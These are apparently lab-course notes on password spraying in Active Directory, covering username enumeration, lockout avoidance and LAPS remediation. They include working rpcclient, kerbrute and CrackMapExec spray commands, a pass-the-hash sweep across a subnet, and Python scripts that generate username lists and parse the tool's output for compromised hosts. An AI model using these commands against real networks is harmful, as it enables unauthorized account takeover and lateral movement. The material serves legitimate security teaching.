Password Spraying Overview
Password spraying is a technique used to gain access to systems by attempting to log into an exposed service with one common password against a long list of usernames or email addresses. Unlike brute-forcing (many passwords against one account), password spraying gives each account only a single failed attempt per round, which keeps every account below the lockout threshold and so reduces the risk of account lockouts.
Key Concepts
- Usernames/emails are typically gathered during OSINT or initial enumeration phases.
- The attack tries a single common password (e.g., Welcome1, Passw0rd, Winter2022) across all target accounts, then rotates to the next password after a delay.
- Effective for gaining an initial foothold or moving laterally within a network.
Username List Building Techniques
- Common username lists: e.g., jsmith.txt from the statistically-likely-usernames GitHub repo.
- LinkedIn scraping: Combine scraped names with common username formats.
- Kerbrute: Enumerate valid domain users by testing candidate usernames against Kerberos.
- Document metadata: Search for published PDFs/documents and inspect the Author field to discover internal username formats. Always scrub metadata before publishing documents.
Real-World Scenarios
- Standard enumeration: Combined a common username list with LinkedIn results, validated users with Kerbrute, then sprayed with Welcome1. Two low-privileged hits were enough to run BloodHound and identify attack paths to domain compromise.
- Custom username format: Discovered a 4-character GUID format (A-Z, 0-9) from PDF metadata. Generated all 1,679,616 (36^4) possible combinations with a bash script, enumerated every domain account, then sprayed to gain credentials and followed a chain involving RBCD and Shadow Credentials to compromise the domain.
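The two list-building steps above (expanding scraped LinkedIn names into common username formats, and enumerating a fixed-length custom format) can be scripted in a few lines. The following is an added example, not code from the original page; the set of username formats in FORMATS is an assumption about typical corporate conventions, and the sample names are constructed.

```python
import itertools
import string

# Common corporate username formats. This list is an assumption for the
# example; replace it with the format revealed by document metadata or OSINT.
FORMATS = (
    "{f}{last}",        # jsmith
    "{first}.{last}",   # john.smith
    "{first}{last}",    # johnsmith
    "{f}.{last}",       # j.smith
    "{first}_{last}",   # john_smith
    "{last}{f}",        # smithj
    "{first}",          # john
)


def candidates_from_name(full_name):
    """Return username candidates for one scraped name.

    Names are lower-cased, non-letters (apostrophes, hyphens) dropped, and
    duplicates removed while preserving FORMATS order.
    """
    parts = full_name.lower().split()
    if len(parts) < 2:
        return []  # a single token gives no first/last split
    first = "".join(c for c in parts[0] if c.isalpha())
    last = "".join(c for c in parts[-1] if c.isalpha())
    if not first or not last:
        return []
    out = []
    for fmt in FORMATS:
        cand = fmt.format(first=first, last=last, f=first[0])
        if cand not in out:
            out.append(cand)
    return out


def build_username_list(names):
    """Expand scraped names into one de-duplicated username list."""
    out, seen = [], set()
    for name in names:
        for cand in candidates_from_name(name):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def custom_format_size(length=4, charset=string.ascii_uppercase + string.digits):
    """Size of a fixed-length, fixed-charset username space (36**4 for A-Z0-9 x4)."""
    return len(charset) ** length


def custom_format_usernames(length=4, charset=string.ascii_uppercase + string.digits):
    """Yield every username of the custom format, in lexicographic order."""
    for combo in itertools.product(charset, repeat=length):
        yield "".join(combo)


if __name__ == "__main__":
    # Constructed sample names standing in for LinkedIn scrape results.
    scraped = ["John Smith", "Maria O'Brien", "John Smith", "Tom Johnson"]
    users = build_username_list(scraped)
    print(f"{len(users)} username candidates from {len(scraped)} scraped names")
    print(f"custom 4-char format: {custom_format_size():,} candidates")
    print("first five:", list(itertools.islice(custom_format_usernames(), 5)))
```

Feed the resulting list to Kerbrute's userenum before spraying so that only confirmed accounts consume attempts against the lockout counter.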
Account Lockout Considerations
- Risk: Careless spraying can lock out hundreds of production accounts.
- Mitigation: Always introduce a delay between password attempts.
- Common policy: lockout after 5 bad attempts; the bad-password counter resets once the observation window (commonly 30 minutes) has passed, and locked accounts auto-unlock after a similar duration. The spray delay must cover the observation window, not just the unlock time.
- Best practice: Obtain the domain password policy before spraying. If unknown, wait a few hours between attempts or limit to a single “hail mary” attempt with one weak password.
- Internal access advantage: With domain access, you can enumerate the password policy directly, significantly lowering lockout risk.
Password Spray Pattern
| Round | Action |
|---|---|
| 1 | Try Password A against all users |
| DELAY | Wait for lockout threshold to reset |
| 2 | Try Password B against all users |
| DELAY | Wait again |
| 3 | Try Password C against all users |
Internal Password Spraying from Linux
Once a wordlist has been created, it’s time to execute the attack. This is one of the two main avenues for gaining domain credentials, but must be approached cautiously to avoid lockouts.
Using rpcclient (Bash One-Liner)
rpcclient is a good option for spraying from Linux. The getusername command returns an Authority Name field only when the SMB login succeeded, so filter the output with grep:
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Example output:
Account Name: tjohnson, Authority Name: INLANEFREIGHT
Account Name: sgage, Authority Name: INLANEFREIGHT
Using Kerbrute
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
Using CrackMapExec
CrackMapExec accepts a text file of usernames to spray a single password. Grep for + to filter out logon failures:
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
Validate a confirmed credential against the DC:
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
Local Administrator Password Reuse
If you obtain the NTLM hash or cleartext password for a local administrator account, it can be sprayed across multiple hosts. This is common due to gold images and shared passwords in automated deployments. Target high-value hosts (SQL, Exchange) as they are more likely to have privileged credentials in memory.
Password Format Patterns to Try
- If a desktop has $desktop%@admin123, try $server%@admin123 on servers.
- If a non-standard local admin account like bsmith is found, try the same password on a similarly named domain account.
- If you get credentials for ajones, try the same password on ajones_adm.
- Credentials for a user in Domain A may be valid for a similar user in Domain B (domain trust scenarios).
Local Admin Spraying with CrackMapExec
Spray an NT hash across a subnet. --local-auth authenticates against each host's local SAM rather than the domain, so every machine receives exactly one attempt for its local administrator account and the built-in domain administrator is never touched (and cannot be locked out):
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
Example output:
SMB 172.16.5.50 445 ACADEMY-EA-MX01 [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.25 445 ACADEMY-EA-MS01 [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.125 445 ACADEMY-EA-WEB0 [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
Note: This technique is noisy and not suited for stealth assessments, but should always be checked and reported.
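Across a /23 the grep + filter still leaves a long list to read. The following is an added example, not code from the original page: a parser for CrackMapExec SMB result lines that turns the output into records, lists hosts where the credential gave local admin (Pwn3d!) and groups hosts by the secret that worked, which is the evidence for password reuse to put in the report. The three success lines are the ones shown above; the failure line and its DOMAIN\user:secret STATUS_... layout are this example's assumption about the tool's output and may need adjusting for other versions.

```python
import re
from collections import defaultdict

# One CrackMapExec SMB result line: SMB <ip> <port> <host> [+|-] <account> [rest]
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<sign>[+-])\]\s+(?P<account>\S+)(?:\s+(?P<rest>.*))?$"
)

# Constructed sample: the three Pwn3d! lines from above plus one assumed
# failure line for a host whose local admin password differs.
SAMPLE = r"""
SMB 172.16.5.50 445 ACADEMY-EA-MX01 [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.25 445 ACADEMY-EA-MS01 [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.125 445 ACADEMY-EA-WEB0 [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.130 445 ACADEMY-EA-FILE [-] ACADEMY-EA-FILE\administrator:88ad09182de639ccc6579eb0849751cf STATUS_LOGON_FAILURE
""".strip()


def parse_line(line):
    """Parse one result line into a dict, or None if it is not a result line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # With --local-auth the "domain" part is the hostname; otherwise the AD domain.
    domain, _, user = m["account"].rpartition("\\")
    user, _, inline_secret = user.partition(":")  # user:password form
    rest = (m["rest"] or "").strip()
    pwned = rest.endswith("(Pwn3d!)")
    if pwned:
        rest = rest[: -len("(Pwn3d!)")].strip()  # leaves the hash, if any
    success = m["sign"] == "+"
    return {
        "ip": m["ip"],
        "host": m["host"],
        "domain": domain,
        "user": user,
        "secret": inline_secret or (rest if success else ""),
        "status": "" if success else rest,
        "success": success,
        "admin": pwned,
    }


def parse_output(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def pwned_hosts(records):
    """(ip, host) pairs where the credential gave local admin."""
    return sorted({(r["ip"], r["host"]) for r in records if r["admin"]})


def reuse_by_secret(records):
    """Map each working secret to the hosts it opened: shared local-admin passwords."""
    groups = defaultdict(set)
    for r in records:
        if r["success"]:
            groups[r["secret"]].add(r["host"])
    return {secret: sorted(hosts) for secret, hosts in groups.items()}


if __name__ == "__main__":
    recs = parse_output(SAMPLE)
    print("local admin on:", pwned_hosts(recs))
    for secret, hosts in reuse_by_secret(recs).items():
        print(f"{secret} reused on {len(hosts)} hosts: {', '.join(hosts)}")
```

Pipe the tool's output into parse_output (or run it over a saved log) and attach the reuse_by_secret table to the finding; a hash that opens three servers is a clearer LAPS recommendation than three screenshots.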
Remediation
Use Microsoft’s free Local Administrator Password Solution (LAPS) to have Active Directory manage local admin passwords, enforcing a unique password on each host that rotates on a set interval.